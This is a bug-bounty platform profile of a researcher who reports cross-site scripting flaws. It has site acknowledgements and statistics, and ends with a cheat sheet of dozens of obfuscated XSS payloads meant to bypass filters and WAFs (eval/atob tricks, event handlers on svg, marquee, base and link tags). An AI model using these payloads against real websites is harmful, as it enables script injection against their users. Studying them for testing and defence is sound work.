Researcher reputation:  410

Real name:
#Gh05tPT #inurlBR #Ch3rn0bylH4ck3r5

About me:
http://blog.inurl.com.br/
XSS Hunter, SQL Maniac, Ex-Defacer, Website Pentester & sometime's a Skid :-D

How to contact me:
https://twitter.com/CGh05t
[email protected]
http://blog.inurl.com.br/
https://facebook.com/podzemie4544

Alternative Contacts:
http://blog.inurl.com.br/

Experience in Application Security
over 5 years

Award / Bug Bounty I prefer:
A thanks/profile recommendation will be really appreciated and its enough, but if you'd like:
paypal.me/Gh05tPT
# Bug Bounty ($$$)
# Hall Of Fame
# T-shirts, Sweats, Caps, Stickers, Keychains, etc

Halls of Fame:
https://www.pejadesign.com/chi-siamo/chi-siamo#manyThanks.
https://unite.un.org/content/hall-fame

Follow me on:
Twitter
Facebook

Recommendations and Acknowledgements

    27 February, 2019

     ChabadoneY Yossi from Chabad.org:

Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!

    27 February, 2019

     ChabadoneY Yossi from Chabad.org:

Gh05tPT reported an XSS vulnerability and took the time to help us through resolving it. Gh05tPT was very pleasant to work with and was very professional. Thanks for all your help!

    7 February, 2019

     VTCMagazine1 Andy from Mudconnect.com:

Thank you for helping mudconnect by reporting the XSS vulnerability Gh05tPT!

    7 February, 2019

     L2JDrLecter Ariel Graneros from Poder Judicial:

Gh05tPT found a security problem in one of our services. Once contacted he responded quickly and professionally. Thank you very much!

    28 November, 2018

     ProdestComunica Eric from Prodest:

Thanks to @Gh05tPT for helping us to increase the security of one of our web applications. Keep up the good work!

    28 November, 2018

     RodrigoFaustini Rodrigo Faustini from Private:

@Gh05tPT reported a XXS vulnerability on our site. Thank you very much!

    19 September, 2018

     franciscomesa Francisco Mesa from ELR:

Gh05tPT found a XSS vulnerability on our website and was quick to respond with technical detail. It's cool to find online researchers with this efficient profile.

    13 September, 2018

     AppsecDiligent Joel Kerr from Diligent:

Really appreciate your help in detecting and helping us resolve our XSS issue. We were able to communicate together and get it fixed within a weeks time. Thanks again!

    7 September, 2018

     MohammedSultanM Sultan from NBA:

Thank you Gh05tPT for the amazing job on pinpointing a weakness on one of our websites!

    4 September, 2018

     aaccomazzi Alberto Accomazzi from NASA Astrophysics Data System:

Thank you Gh05tPT for pointing out a security issue on our server, appreciate your work!

Shows the first 10 recommendations. See all.

Awards and Achievements

Number of Secured Websites

10+ Websites	50+ Websites	500+ Websites	WEB SECURITY VETERAN 1000+ Websites

Advanced Security Research

WAF Bypasser	CSRF Master 30+ Reports	AppSec Logic Master 30+ Reports	Fastest Fix Fix in 24 hours

Outstanding Achievements

Secured OBB	OBB Advocate	Improved OBB

Commitment to Remediate and Patch

Patch Master 55% Patched	Patch Guru 65% Patched	Patch Lord 75% Patched

Recommendations and Recognition

REPUTABLE 10+ Recommends	FAMOUS 25+ Recommends	GLOBALLY TRUSTED 50+ Recommends

Distinguished Blog Author

1 Post	3 Posts	5+ Posts

Research Statistics

Total reports:	10532
Total reports on VIP sites:	144
Total patched vulnerabilities:	3814
Total vulnerabilities on Hold (Open Bug Bounty):	3584
Recommendations received:	28
Active since:	05.04.2018
Top Security Researcher Awards:	Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month Top Security Researcher of the Month

Open Bug Bounty Certificate

04.04.2019  XSS alert() variants

<script>prompt(1)</script> 
<script>confirm(1)</script>
<script>var fn=window[490837..toString(1<<5)];     fn(atob('YWxlcnQoMSk='));</script>  
<script>var fn=window[String.fromCharCode(101,118,97,108)];     fn(atob('YWxlcnQoMSk='));</script> 
<script>var fn=window[atob('ZXZhbA==')];fn(atob('YWxlcnQoMSk='));    </script>
<script>window[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>     <script>this[490837..toString(1<<5)](atob('YWxlcnQoMSk='))</script>     <script>this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][+[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]](++[[]][+[]])</script>     <script>this[(+{}+[])[-~[]]+(![]+[])[-~-~[]]+([][+[]]+[])[-~-~-~[]]+(!![]+[])[-~[]]+(!![]+[])[+[]]]((-~[]+[]))</script> 
<script>'str1ng'.replace(/1/,alert)</script>     <script>'bbbalert(1)cccc'.replace(/a\w{4}\(\d\)/,eval)</script>     <script>'a1l2e3r4t6'.replace(/(.).(.).(.).(.).(.)/,function(match,$1,$2,$3,$4,$5) { this[$1+$2+$3+$4+$5](1); })</script> 
<script>eval('\\u'+'0061'+'lert(1)')</script>     <script>throw~delete~typeof~prompt(1)</script>     <script>delete[a=alert]/prompt a(1)</script>     <script>delete[a=this[atob('YWxlcnQ=')]]/prompt a(1)</script>     <script>(()=>{return this})().alert(1)</script>    
<script>new function(){new.target.constructor('alert(1)')();}</script>     <script>Reflect.construct(function(){new.target.constructor('alert(1)')()},[])</script> 
<link/rel=prefetch import href=data:q;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg>
<link rel="import" href="data:x,<script>alert(1)</script>     <script>Array.from`1${alert}3${window}2`</script>     
<script>!{x(){alert(1)}}.x()</script>     <script>Array.from`${eval}alert\`1\``</script>     <script>Array.from([1],alert)</script>     <script>Promise.reject("1").then(null,alert)</script>     
<svg </onload ="1> (_=alert,_(1)) "">     
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>  
<marquee loop=1 width=0 onfinish=alert(1)>
<p onbeforescriptexecute="alert(1)"><svg><script>\</p>     
<img onerror=alert(1) src <u></u>     <videogt;<source onerror=javascript:prompt(911)gt;     
<base target="<script>alert(1)</script>"><a href="javascript:name">CLICK</a>     
<base href="javascript:/"><a href="**/alert(1)"><base href="javascript:/"><a href="**/alert(1)">     
<style>@KeyFrames x{</style><div style=animation-name:x onanimationstart=alert(1)> <     
<script>```${``[class extends[alert``]{}]}```</script>     <script>[class extends[alert````]{}]</script>     
<script>throw new class extends Function{}('alert(1)')``</script>     <script>x=new class extends Function{}('alert(1)'); x=new x;</script>     <script>new class extends alert(1){}</script> 
<script>new class extends class extends class extends class extends alert(1){}{}{}{}</script>     
<script>new Image()[unescape('%6f%77%6e%65%72%44%6f%63%75%6d%65%6e%74')][atob('ZGVmYXVsdFZpZXc=')][8680439..toString(30)](1)</script>     <script src=data:,\u006fnerror=\u0061lert(1)></script>     
"><svg><script/xlink:href="data:,alert(1)     <svg><script/xlink:href=data:,alert(1)></script>     <frameset/onpageshow=alert(1)>     
<div onactivate=alert('Xss') id=xss style=overflow:scroll>     
<div onfocus=alert('xx') id=xss style=display:table>